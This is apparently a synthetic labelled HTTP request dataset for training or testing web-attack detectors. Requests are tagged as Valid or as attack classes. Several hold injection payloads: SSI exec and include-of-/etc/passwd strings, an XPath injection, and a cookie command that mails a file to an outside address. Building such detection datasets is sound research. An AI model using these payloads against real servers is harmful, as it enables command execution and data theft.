Pragma: 8wwi='a'
Proxy-Authorization: eifolu 4ediEcn=nOfs3b
Authorization: Basic d2lpMDpubE5pb3M0
Range: 834-,-492,8796-9
Referer: /r6ro5we/sam7/srlui/pt9n8wlo.msf
TE: gzip,trailers
Trailer: Accept-Encoding
User-Agent: slvhVXfN http://www.asimo.org
UA-CPU: Sparc
UA-Disp: 837,1241,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5649x2813
Via: FTP/1.2 90.102.85.106, HTTP/5.5 www.mtled9d.shtml, Oaaseo/1.7 www.pntvino.png:64651
Transfer-Encoding: deflate
Upgrade: rAn/3.9
Warning: 279 www.eTTt9.html:61892 "e6edtaEHsOeiysxShtT" 
X-Forwarded-For: 18.27.104.194
X-Serial-Number: 537380175884943310
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Gfht=lS&drsdlIzlea0at=cmd6l&nhn9ssdrn=ostjahtonjozT&iehohhs=39066&nThnyS=telnetvrlmIdg8]&svIWnA6mingroup byN=ce6ouhuo

End - Id: 3889
Start - Id: 39944
class: SSI
POST /o98.cY8tTVv1UAId87L/aQkIkR/4zUJj08mjjh6C/tE/hEeubasinitDO/ooawrenoiitnn82i9ai/o2C_/ztae.html? HTTP/1.1
Content-Length: 358
Content-Language: 7
Content-Encoding: compress
Content-Location: http://www.anio5eE.com/Dapar8cu/Odio8y/eftP.zip
Content-MD5: dHppcTBNaXNudGl3MG1vOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Sep 09 12:45:07 UTC
Last-Modified: Fri, 04 Nov 05 03:07:56 CET
Host: 45.53.211.76
Connection: close
Accept: text/plain, text/*
Accept-Charset: shift_jis;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: zbelch=Qckoo
Client-ip: 195.128.80.161
Cookie: iaowor2iir=mfhtOaamni;LtxroSfh8enj3ri=rhaxeoaTj;h-yOvkI3xp_=aVBpgMvyL;fm7es5=rs~s~sunionwc
Cookie2: $Version="04"
Date: Fri, 07 Nov 08 18:33:04 UTC
Expect: acstne=Sh1yt
If-Modified-Since: Fri, 13 Nov 09 19:41:25 UTC
If-Unmodified-Since: Sat, 08 Jan 05 07:08:16 CET
If-Match: *
If-None-Match: "jbFnPUIQs@Tr7oW"
If-Range: Tue, 21 Dec 04 04:54:50 UTC
Max-Forwards: 4
MIME-Version: 5.1
Pragma: ijwW=O
Proxy-Authorization: NTLM MnQ0N3d2bnRjbTF3dGQzdEFha2l0bjlybHhocGxhaGVlbnRsbjhhclI=
Authorization: wurmu dgxOi2=snshjh
Range: 1-586
Referer: /txov7r/v2ti.pl
TE: trailers
Trailer: From
User-Agent: Mozilla/9.4 (compatible; Konqueror/1.0; SunOS sun4u; ayilvm)
UA-Pixels: 3924x987
Via: ra2g/2.6 www.eeea.png:81, 3.4 39.145.155.170, FTP/2.3 www.jkuhxce.gif:7
Transfer-Encoding: deflate
Upgrade: AWutq/3.3, Ereghm/5.5, aashd/6.2, ypndU4/8.9, Egoa/7.9
X-Serial-Number: 029145604

urmzftyl7Ontbed=2728742551&yNtqdrsoBt7t3it=u8h(&rki75wqigHo=oQ2VC9Ybic6&tousksmai2h=s20HBv9DPof7&uaceisr=mm.ee&3lwinntodv=fnt$mt+m6deletece&totgxoetz3isjTu=nna&TYeDiml=ylmsruh&&iJtszEoi=2684&nnEddlhOdlEE5i=itm qacwLxxleAfm&dcoroxl=bvVtWDc_VhY&ilwTorehndlmE=a&2TJsystemg=<!    #<!--  #exec    cmd="id"-->&uOwyAye= &Uxp_qTyvcy=dty6d

End - Id: 39944
Start - Id: 13459
class: Valid
GET /sObjNJbHWpPKUYIn/dVnEjcW3hxcgqsP/nweqb6-acf4E.PswN7.Q/lteehGeulEeayroA/n3/uVsmailtqZlB/o2D0fva./6D.iISpgaGmYb_t9g/CRuNK1q7Jh485w/mtneuelsclaugygEocut/6emkto0.dll?etc9umny2gt=aqq9aobjectra%29dsa&ealcgrahinpj=finatsss0leiuq&shh0eE5nbhh8f4i=4++tisntMk&ecsOh=Tbstnudtee&e2eoier=meewgrvto+er&tRlhts2ltu=46&nrcdaharLgenf=Io&x0N09eosggjtbaH=hIzO9i%40Rc&WQQ0telnetxmlqy=d8F-yIpnX8Xc&5XcT=Ein&JcK7KgTFye=eUec%3Baqeno&sa9aieomroc=250741342 HTTP/1.1
Host: 199.108.162.110
Connection: 6c78c
Accept: video/quicktime, video/*;q=0.9, audio/basic
Accept-Charset: x-mac-greek;q=0.6, macintosh, windows-1253;q=0.8
Accept-Encoding: 
Accept-Language: ein0aoet-Uitotbev;q=0.8, jnl-caE
Cache-Control: no-store
Client-ip: 208.189.220.255
Cookie: nwre9tstwzzddto=%'ru7&Wjqssuie5;ktege=u0mtNuiat)da;UoKir9hM.C=400412590;tnsai2ejorshOfo=edprocessing-instructionk?qi;bgsounduoo4ew;stoe5lVn8R=dDrtdysnofeoe;tbvbaotattq=iiwegt
Cookie2: $Version="7"
Date: Tue, 19 Jun 07 13:36:38 GMT
ETag: W/"9cClyJiotc2LukdJQ6R"
Expect: jo5am=rShvn;aptesIgs=saftiid
From: rwsar@atw2syurH.be
If-Modified-Since: Sun, 15 Jun 08 21:02:25 CET
If-Unmodified-Since: Wed, 17 Jun 09 22:17:35 GMT
If-Match: *
If-None-Match: *
If-Range: "SY2U5MEfYzaFRSx4"
Max-Forwards: 71
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM c29lb25mYXNyc25sc29uZUJkb2F4b2FlczBqRWxOck50cHJsaQ==
Authorization: NTLM MWRhaW9ybmhvaXRtZWFuc2x0ZWVlaXJIb25sb1Vyc3Q=
Range: -20257
Referer: http://www.bLbUssa3.ch/y7olfml.asp
TE: trailers,gzip;q=0.4
Trailer: Accept-Encoding
User-Agent: imast8inZ
UA-CPU: x86
UA-Disp: 710,2643,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1859x8849
Via: 5.7 www.ef3ahD.png
Transfer-Encoding: gzip
Upgrade: bO6/2.7, oawf6h/2.0
Warning: 403 www.ameiXrAq.jpg:50 "inohizhcts2llsj" "Mon, 19 Jun 06 02:09:24 GMT"
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 564796261351412431
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13459
Start - Id: 2203
class: Valid
GET /paee1laalao4ref/07/5Z.bin? HTTP/1.0
Host: www.rqT9oce2T.it
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis, x-mac-japanese
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2609
Client-ip: 191.211.90.143
Cookie: fNrIratse5t=)7;rAdyanewirpci8l=nea9https;telt=83616
Cookie2: $Version="0"
Date: Tue, 20 Oct 09 18:50:47 GMT
ETag: W/"NEm@awN1m2OzGEF"
Expect: msrta5n=iitiioje;eefdi=Kedcr8o
From: mennl@hhaoaw.st
If-Modified-Since: Mon, 07 Aug 06 21:54:27 UTC
If-Unmodified-Since: Sat, 18 Apr 09 03:19:00 CET
If-Match: *
If-None-Match: "9VlaBbz-_ou4@FXY"
If-Range: Sun, 23 Sep 07 14:13:22 CET
Max-Forwards: 926
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic bmVGeGU6aThsZGc=
Authorization: Basic dHNtY286YnBvN3RlYQ==
Range: 646-76073,721917-1
Referer: /rcau/an5uEe/Aq7Og/inat/hth8.avi
TE: gzip;q=0.2,chunked;q=0.1
Trailer: If-None-Match
User-Agent: phlhr8znaa7rsGfe
UA-CPU: Sparc
UA-Disp: 8951,7788,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 318x353
Via: FTP/4.5 247.12.255.51, HTTP/2.3 80.139.78.107, 4.4 211.123.188.161
Transfer-Encoding: compress
Upgrade: ql7Ei/0.0
Warning: 810 www.morweae.jpg "sa4qrwUneheea7hlfh" 
X-Forwarded-For: 2.94.110.211
X-Serial-Number: 26606464842114964
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2203
Start - Id: 4115
class: Valid
POST /anLQxwp.srCjylfNFBnc.js? HTTP/1.0
Content-Length: 225
Content-Language: zoctd
Content-Encoding: gzip
Content-Location: /6t5ie/eiljety1/ete5e.php
Content-MD5: b21hZGV5cGVvenRkcmd1bw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Jun 04 04:01:16 UTC
Last-Modified: Wed, 06 May 09 13:25:21 UTC
Host: www.jtlo.de:80
Connection: xn4bl6
Accept: video/*;q=0.7, audio/basic;q=0.3
Accept-Charset: x-mac-japanese, iso-8859-1;q=0.8, x-mac-korean;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.9
Cache-Control: max-age=62731
Client-ip: 90.59.196.121
Cookie: okaqqhesemtn03=45696584
Cookie2: $Version="692"
Date: Wed, 01 Sep 04 03:52:28 GMT
ETag: "us4d89NA6NiZePn"
Expect: 100-continue
From: tEpEp@tir3gian.cz
If-Modified-Since: Mon, 06 Apr 09 20:57:27 CET
If-Unmodified-Since: Wed, 27 Dec 06 03:45:49 CET
If-Match: "mEtTyOIEZU5sbaIqKWRk"
If-None-Match: *
If-Range: *
Max-Forwards: 9177
MIME-Version: 2.9
Pragma: oeCwm5='Ro'
Proxy-Authorization: aisesf nMetM=q8cte1s
Authorization: Basic aXNmMzp0eDJueWU=
Range: 149-,88457-
Referer: http://www.ifhgsf.fr/ednan/Httuuc.asp
TE: gzip,deflate,trailers
Trailer: Pragma
User-Agent: atprvv (suy.UDKVBv; unBIc_; bx3EGJZ)
UA-CPU: StrongARM
UA-Disp: 6182,3319,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 334x3982
Via: 7.2 82.143.216.4, 6.2 169.74.154.61, FTP/5.9 8.170.170.18
Transfer-Encoding: gzip
Upgrade: txgQ/6.8, rwt/5.6, p7law4/7.6, Pi4lm/5.6
Warning: 595 www.endswe0t.htm "rojqzsooogwsngCtsaaa" 
X-Forwarded-For: 237.176.231.213
X-Serial-Number: 13901599653
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

tthteooa=sLefEz5stV1&amnspt=7001320&pi=esslbae1hntd&toca8tprTa5eiy=reshstns&d6rtee7g=eEtmr4lNeEceOqceam&rEIUcGi5ERj=284628&nbsOhi=tba&eah=iA winntopeni3&ntLqojKEAa=(siTEvo5ogtb&vnoTeaErom=74&eotusr8ai=$o&enieBktffh2iO=oii

End - Id: 4115
Start - Id: 22789
class: Valid
GET /tnureman4aLOar/ySnhseEys/FP@577OianodeMLt./A9ebNztesii/tM0.msf? HTTP/1.1
Host: 196.116.183.152
Connection: tNla
Accept: */*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.5
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 227.73.123.190
Cookie: hD0tqMe4aisrt14=caubnz1
Cookie2: $Version="225"
Date: Fri, 07 Oct 05 05:27:45 CET
ETag: W/"eKu6h5Nl2CjgMZnjC32"
Expect: ioGl=hyroe6;Nwoptml=qlnsr9an
From: 2sn4@17ermwiU.be
If-Modified-Since: Mon, 29 Nov 04 07:23:42 GMT
If-Unmodified-Since: Tue, 21 Sep 04 09:38:17 GMT
If-Match: "om3j4xXZFmvmxOI4Db"
If-None-Match: "GXK3l3DpB0o.aWGX31N"
If-Range: *
Max-Forwards: 82
MIME-Version: 0.5
Pragma: sr=b8iz5udi
Proxy-Authorization: Basic NHROdHN0OnJFSWVn
Authorization: Digest realm
Range: -637
Referer: http://www.sjhOpt.net/t36oise/5dos/limsp0sw.gz
TE: trailers,deflate
Trailer: TE
User-Agent: t9gl2tazoi
UA-CPU: 68000
UA-Disp: 9973,4219,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 396x8159
Via: HTTP/6.7 www.0tOnied.jpeg:33
Transfer-Encoding: gzip
Upgrade: zuf/1.3, ons/6.0, ctn/4.8
Warning: 885 www.tedi.jpeg "soelhnre6erIg2cgg6" 
X-Forwarded-For: 147.118.27.36
X-Serial-Number: 058187169230158
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 22789
Start - Id: 49664
class: XPathInjection
GET /ha4SK/heZrfUT5i/lNggT1_/aTxQN.cgi?4jyrrthtes=iRaooe%27+++++or+++aatNc%2Fle%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D91%5D+or+++++%27aol1%27%3D++++%27&taihtntefg7al=omhtaccesn+iSetyh&glo=neD&rOh9ayneo=8toqiu4yt1etDi&hiroaauSeX=C7u&ciettznlja=nb HTTP/1.1
Host: www.iyabNluN.de
Connection: close
Accept: image/gif;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 35.126.171.6
Cookie: Dyamsgroup byLE=yr5u=oa8tmptn ylnullrrm&;5GaYbfryNnph-hm=tz;eoniiShotIievnD=wnucsmnfevbnlndc;BRKnqbpMGZ2=tYfwF3;amamrmHoHcn3=043;ltaoir=ftWJ2m9
Cookie2: $Version="12"
Date: Fri, 06 May 05 23:16:07 CET
ETag: "-oUkV855XGZ38_U5ND"
Expect: 100-continue
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Wed, 22 Sep 04 13:56:17 UTC
If-Unmodified-Since: Sat, 19 Nov 05 03:19:41 UTC
If-Match: "CEES_gQEnf860LuG"
If-None-Match: *
If-Range: Wed, 04 Mar 09 13:52:13 UTC
Max-Forwards: 7
MIME-Version: 8.7
Pragma: a5dme='ou'
Proxy-Authorization: Digest nonce
Authorization: Basic cW9pb3NzOmVvdW5t
Range: 7083-858216,-723,8872-
Referer: http://ttahes.de/SPngno/Infnhrx/tcg59/ecdeid.jpeg
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/4.7 (compatible; tEhwzfEtvt; Linux i386; nanoth)
UA-CPU: x86
UA-Disp: 014,944,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 668x5866
Via: FTP/0.9 11.193.124.145, Qwoue/9.7 191.20.43.250, 5.8 www.frun.htm
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
Warning: 044 www.ewuqbi.js "trhiteoe9" 
X-Forwarded-For: 113.186.2.179
X-Serial-Number: 38921697
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49664
Start - Id: 35941
class: PathTransversal
GET /oBQbwuFBm9yi4fG6a/gL/o.4wEy/oCHpnnXTq@/eRc.dll?n2grTbt5cOs=%3C%21--++%23include+virtual%3D%22%2Fetc%2Fpasswd%22--%3E HTTP/1.1
Host: 78.37.61.130
Connection: keep-alive
Accept: video/quicktime;q=0.7, application/*;q=0.5
Accept-Charset: gb2312, x-mac-japanese;q=0.7, koi8-r;q=0.4, iso-8859-7;q=0.8, windows-1251
Accept-Encoding: compress
Accept-Language: 3ovot-d, 5-z, gsisLmr-fa, iEc-hsn;q=0.4
Cache-Control: min-fresh=14
Client-ip: 107.17.117.247
Cookie: tyrtZ65s=7;CRJJV42ig=ehem8sinsertxselect$h;sesu=19492;wa=Inhy  fu
Cookie2: $Version="19"
Date: Sun, 22 Aug 04 18:08:34 GMT
ETag: W/"KVz0darYpD@iPYSQ"
Expect: tesEzam
From: niaeaa@eH6xdhht.com
If-Modified-Since: Fri, 01 Dec 06 21:13:23 UTC
If-Unmodified-Since: Wed, 10 May 06 21:02:53 UTC
If-Match: "0e_j1lrGtWMXy2JVYV1"
If-None-Match: "Ww7OGdxwNdKHPFGEUbDF"
If-Range: *
Max-Forwards: 83
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ei6idr"
Authorization: Digest algorithm=m2uoga
Range: -25,5895-
Referer: /wric.sh
TE: deflate,trailers,trailers
Trailer: If-Range
User-Agent: 4y3s/7.7
UA-CPU: 68000
UA-Disp: 684,759,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 279x705
Via: 1.7 145.24.126.106
Transfer-Encoding: compress
Warning: 334 www.lstanho.png "Hdnhe0hyyoGe34osiao" "Mon, 03 Nov 08 14:09:43 CET"
X-Serial-Number: 2416806
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35941
Start - Id: 29824
class: Valid
GET /e1bmH/doslen5zauuse/sr/Nea5tarvOvt/fhoyCorSsffetgxfaio/n3eoenmlnoddr/2PyUYzqk1k6z6EjXf2QE/wX4JfxCfjS-6Y5.WmGoK/eut1mdctpiswpeiaaudL.htm?6kzm0d=dde2tem&fJwxQpzM=eue0&syoIdv=styleEpca%26&KSgR=stR HTTP/1.0
Host: www.edor.gov
Connection: keep-alive
Accept: video/quicktime;q=0.7, application/x-tar;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: anieenai-atmwrePl, o-Iye, suet-mlse, etaafted-xi, tqlle-NedNT;q=0.9
Cache-Control: no-store
Client-ip: 81.250.214.9
Cookie: ohbwbcea2s6eN=847
Cookie2: $Version="7"
Date: Sat, 22 Nov 08 20:18:29 UTC
ETag: "0AVT7Fy1MSqi0kB"
Expect: lmMsh65=my1po
From: ia7p3pss@ntalbtmsl.gov
If-Modified-Since: Tue, 23 Dec 08 07:10:40 GMT
If-Unmodified-Since: Mon, 17 Dec 07 10:26:23 GMT
If-Match: *
If-None-Match: "YPgdHkeufXmI4ycm@e"
If-Range: Sun, 23 Apr 06 02:04:44 GMT
Max-Forwards: 90
MIME-Version: 7.9
Pragma: p=nea8Ejai
Proxy-Authorization: Digest opaque="iebwoe"
Authorization: Digest realm
Range: 9669-56204,57635-,19451-
Referer: /tsewr/atsh/huieden/enrnw/9s1h3eE.jpg
TE: deflate,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: uui2tsxu (wfjti3-2iR; oyF_efe7; mlYFLnd)
UA-CPU: 68000
UA-Disp: 793,154,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 238x9907
Via: anmstt/3.0 www.5noeoue.tiff, FTP/3.3 25.143.199.67
Transfer-Encoding: gzip
Upgrade: eao/6.7, qpa/6.7
Warning: 757 171.183.186.152:6 "lkOups" 
X-Forwarded-For: 22.79.136.228
X-Serial-Number: 211553371251
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 29824
Start - Id: 9394
class: Valid
GET /Cuoe6vsa93naue/hjHEIAQd8/ahhniaisnes7n5sWtxoO/ydajopdtji9ccep/neOg/NUuDvrM/csfeaneteogSzoqaaa/Umeta.php4?ilretow8=spasswd8t+&es3n=6975911366&wnlspn=991684&tmoneir5yeeeeh=79756&sIooRwThe=0+%3Bontphr&Aour5atrhhdk=547&HniiicItne6lue=ede+Msam-o0%40ora&6Ottretaiienu=Z+u1teydsae%3Fma&se0n0lfgc1nfunj=raagxp_&lt=m3ed%5CnfsshtaccesH%29snulle&nawe3i=eo&nveie9iewiEs=enr&iaiaR82nhtV=3&77sgOioolep8iue=oyfDpw&h4uulcre8eth2r=1eNlhnt4++db%3Dhwr HTTP/1.1
Host: www.t2hssTrh.net
Connection: keep-alive
Accept: audio/*;q=0.2
Accept-Charset: shift_jis;q=0.3, ks_c_5601-1987, euc-tw;q=0.8
Accept-Encoding: *;q=0.7
Accept-Language: fone-t6dmd;q=0.9, farSc-nbrh;q=0.7, 8-waWyad, 9srl-ertfnlaz;q=0.9, Lv2-hteidian
Cache-Control: min-fresh=4
Client-ip: 50.16.85.193
Cookie: uacoxeeb=iNstguomtonri;pRehPfittpf=enboopye4tnet;0nmfkhei=ttLqyraan7;ihttge=3716;lveaoiinoudca=ca
Cookie2: $Version="524"
Date: Thu, 27 Apr 06 09:55:28 CET
ETag: W/"kDeYTIighsPSvHlH"
Expect: Gelijrtc=Sst8;p4Rgnin3
From: sspvni@sliueDto.cz
If-Modified-Since: Wed, 10 Jan 07 20:50:43 UTC
If-Unmodified-Since: Wed, 09 Feb 05 06:26:41 UTC
If-Match: *
If-None-Match: "0YLZmJmD-.0hL5YyCRj"
If-Range: Sun, 17 Jul 05 21:47:53 GMT
Max-Forwards: 97
MIME-Version: 9.5
Pragma: f6='e'
Proxy-Authorization: OdcSix ayHxs=easseTwo
Authorization: Digest username="gstaauni"
Range: -33681
Referer: http://cyorxi.st/cdej.avi
TE: chunked,trailers,gzip;q=0.1
Trailer: Connection
User-Agent: ahunnsEoUA0x7
UA-CPU: Sparc
UA-Disp: 147,1254,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 9764x9599
Via: FTP/2.7 53.154.9.229
Transfer-Encoding: identity
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 141 www.einoanl.htm:6 "nnnhSshhuitzceoekrhE" 
X-Forwarded-For: 89.84.41.1
X-Serial-Number: 279192052215591
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9394
Start - Id: 15551
class: Valid
GET /np/hXV9jsEb7Lx-mp890v.css?ZSA3IEIinclude8=3iz&ndteet9sbhs=+urAsock_streamsce6rstyle&3tm32cdstetupNs=h-.WNEP&nele=inco&wnihei9msxfactr=giTtmoRycnho&no=4950184&nseslnGaeortoy=k0&iIo8obtc=LR0cmd7ooly&etBoouE=oaccess_logh0os HTTP/1.1
Host: www.el3owt4rim.uk
Connection: keep-alive
Accept: image/*;q=0.1, image/jpeg;q=0.6, audio/*
Accept-Charset: windows-1250
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=3
Client-ip: 227.212.204.1
Cookie: c8EKsam=00326;oytIasslyst=(:e;Enovtc=a&cis;unmaoUEre=45
Cookie2: $Version="420"
Date: Sun, 19 Sep 04 04:29:06 CET
ETag: "Cqt5eE91-djhUSQE"
Expect: 100-continue
From: Ftobr@eibao.net
If-Modified-Since: Tue, 11 May 04 11:16:42 UTC
If-Unmodified-Since: Wed, 05 Dec 07 22:26:13 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 69
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic aXRubmVoMTp3OXNzcmli
Authorization: Basic ZHRzdDpvdmhv
Range: 1-622060
Referer: http://www.eheejds.de/Ewe9/1ld7eXtc/8Tkl.wav
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/3.4 (Machintosh; U; PPC Mac OS X 7.0; ad-ht; rv:3.2.6) Gecko/57799762
UA-CPU: x86
UA-Disp: 8876,6331,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5730x198
Via: 4.6 www.vuuba3.css:9636, FTP/7.9 www.euhR.htm, 8.4 86.240.195.243:14045
Transfer-Encoding: deflate
Upgrade: 2oio/9.9, zoEb/6.5, rBf/9.8, 1rfose/4.7, 4mlc/0.6
Warning: 995 www.oigsc.css "fWumtNl" "Sat, 03 Oct 09 14:38:14 UTC"
X-Forwarded-For: 144.153.36.75
X-Serial-Number: 4557726217620382027
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15551
Start - Id: 32064
class: Valid
GET /li/eul8idayKnnnUf4sne.jpg?jtFPLfpXiy=07&6Or5jDexec=onha HTTP/1.0
Host: www.oz4ttN.cz
Connection: keep-alive
Accept: application/*, video/mpeg;q=0.1
Accept-Charset: iso-8859-15;q=0.2, iso-2022-jp;q=0.2, x-mac-roman, x-mac-arabic;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: GR1e1see-dtalf;q=0.0, csb-ylPl7;q=0.1, mtei-eehdtwe;q=0.9, Luesa7x-sN;q=0.8, iF8-nmrie0
Cache-Control: no-store
Client-ip: 83.23.198.140
Cookie: stmssihjNioorc=vvtymarrftjt8;iph=sowAl;cuonameMwo=n0snne;srmS4=arhStetsear;aheeFe23sl=7415667295;ctlsevnsro9enn=ido yb
Cookie2: $Version="7"
Date: Thu, 10 Jan 08 20:32:15 CET
ETag: W/"qAkeEvge-usYZ38PeGQ8"
Expect: 100-continue
From: hGao@Hawa.uk
If-Modified-Since: Tue, 08 Jan 08 09:05:16 CET
If-Unmodified-Since: Fri, 29 Feb 08 21:03:54 GMT
If-Match: *
If-None-Match: "pLZIK3cUxESo3gtiG5"
If-Range: Thu, 08 Jan 04 11:08:13 CET
Max-Forwards: 89
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: 4pmriH i9awgwm=0r0g
Range: 81-,-8,-69673
Referer: http://www.i8ga.org/6atnesoo/gnihp/2epeuqbt/ue2tRqm4.jsp
TE: deflate;q=0.6,trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/4.6 (Windows; U; WinNT 7.2; tj-rc; rv:7.1.1) Gecko/72530591
UA-CPU: MIPS
UA-Disp: 342,5429,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8495x114
Via: HTTP/7.6 176.133.143.218, HTTP/5.3 15.169.125.36, twbue/4.4 www.4lslewL.css
Transfer-Encoding: deflate
Upgrade: boli/1.4, iew/6.5, uoh/6.1
Warning: 167 94.137.101.249 "sidalepniti" "Sat, 29 Oct 05 02:08:38 GMT"
X-Forwarded-For: 62.83.138.43
X-Serial-Number: 2637635307
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32064
Start - Id: 42986
class: OsCommanding
GET /otlse6/zv4ycn/Z9Pxterm6F/a-iW79.aM6mMki.cfm?Tl=0311362&tuoshco67besna=32&roiuNaeuss=38702&m69nlgtuje=d&bms3tAN3gguL1rM=likeeperlhavingOvr+ia&eseuq6r=73320630 HTTP/1.1
Host: 127.169.59.204
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: uaya-fijuils;q=0.1, t8do-5teis, IE9sdPU-7hot, n31ce-217innso
Cache-Control: no-cache
Client-ip: 96.45.64.53
Cookie: ushpo=9oHn;oeei6wdj9rp=rhtirhDoPunj4;fzhjhhhfgmMrdit=';   cat  /tmp/res  mail   meisreit@dellst.com   ;;yeahb5l=aautoexec;wKstyleuqlike=rtnig8;smtfnx7jsi=r8ZL
Cookie2: $Version="214"
Date: Thu, 22 Sep 05 04:18:56 UTC
ETag: W/"kfEM4sG8zo5gSR-H@a@"
Expect: moEazR
If-Modified-Since: Tue, 29 Jul 08 06:48:03 CET
If-Unmodified-Since: Mon, 05 Sep 05 08:09:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6544
MIME-Version: 5.7
Proxy-Authorization: ws2oed nnitapa=iroLw
Authorization: Digest cnonce="rIeaeae"
Range: -019,88587-67,-152063
Referer: http://seedpca.fr/ytwrrHl3/aRihro36/lucy/7tgm.fgf
TE: chunked,chunked,trailers
Trailer: TE
User-Agent: Mozilla/3.0 (compatible; Iod8; Win 9x; en67a; ciaF)
UA-Pixels: 663x0637
Via: FTP/0.5 219.253.9.22
Transfer-Encoding: identity
Upgrade: wfH/1.6, nhn/7.3
X-Serial-Number: 104195049605693
----: -------------------------------------------------

null

End - Id: 42986
Start - Id: 271
class: Valid
GET /h6aiyjt1@vFXSDaqF9l.png? HTTP/1.0
Host: 116.66.143.222:7
Connection: rtes
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: heop-tEo
Cache-Control: no-cache
Client-ip: 101.38.207.176
Cookie: eestP=ei;ntg6lerL9hlw=autoexec3nulle;ihoi=pd6e;yc7=iywe98Iuwc93
Cookie2: $Version="59"
Date: Thu, 26 Feb 04 14:09:16 CET
ETag: "Ud7ZAblhfYrrrtcOlb"
Expect: 100-continue
From: 6bLaew@vziehEtalu.st
If-Modified-Since: Thu, 19 Jun 08 23:31:51 UTC
If-Unmodified-Since: Sun, 10 Aug 08 20:02:04 GMT
If-Match: "jZ4Cs8BKUJWLi8fyAC"
If-None-Match: "SDh6wUCZkNCQu3FfJ3su"
If-Range: "bY3mV9getino9rbs"
Max-Forwards: 62
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM aXRzcHdpdHVqVnRpMG9hZTNtcmRpZXR1RXNoc2hjbHNhc3F0ZXNCMWFzcmk=
Authorization: Digest cnonce="dsosoe8o"
Range: 45-32,65908-442586,1566-181
Referer: /1ae6cOm/ou5azkn/umnor/btsin7/htJehegc.nsf
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/4.8 (X11; U; Solaris 6.4; ll-eb; rv:1.9.0) Gecko/19343418
UA-CPU: x86
UA-Disp: 223,1661,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4622x2387
Via: 7.1 www.hiUezsi.shtml, HTTP/4.8 126.109.98.57, 8.8 25.169.76.33
Transfer-Encoding: bDiS7s
Upgrade: ire50s/8.5, lsas/9.0, cuedrY/9.7, o119/9.2
Warning: 583 117.40.109.55 "p3wiZwmotaawnneweih" "Tue, 23 May 06 21:35:57 GMT"
X-Forwarded-For: 127.92.165.64
X-Serial-Number: 1403649840234
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 271
Start - Id: 14748
class: Valid
GET /rokt1in/h9OOt2LzD0bfOvY4e/ZuSv0qJTaneRwp--8/0tiaso/goiig7rfwgisAra6hlhE/o5sfyetc4/8etndcUwr0e6/imw8esnohhlh2/m7aiclrldw2aiexbH/tbl4dtoirpae8Gtetr/hSZKqC/iTyl@H.css? HTTP/1.1
Host: www.eIgeeTspe.it
Connection: close
Accept: image/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
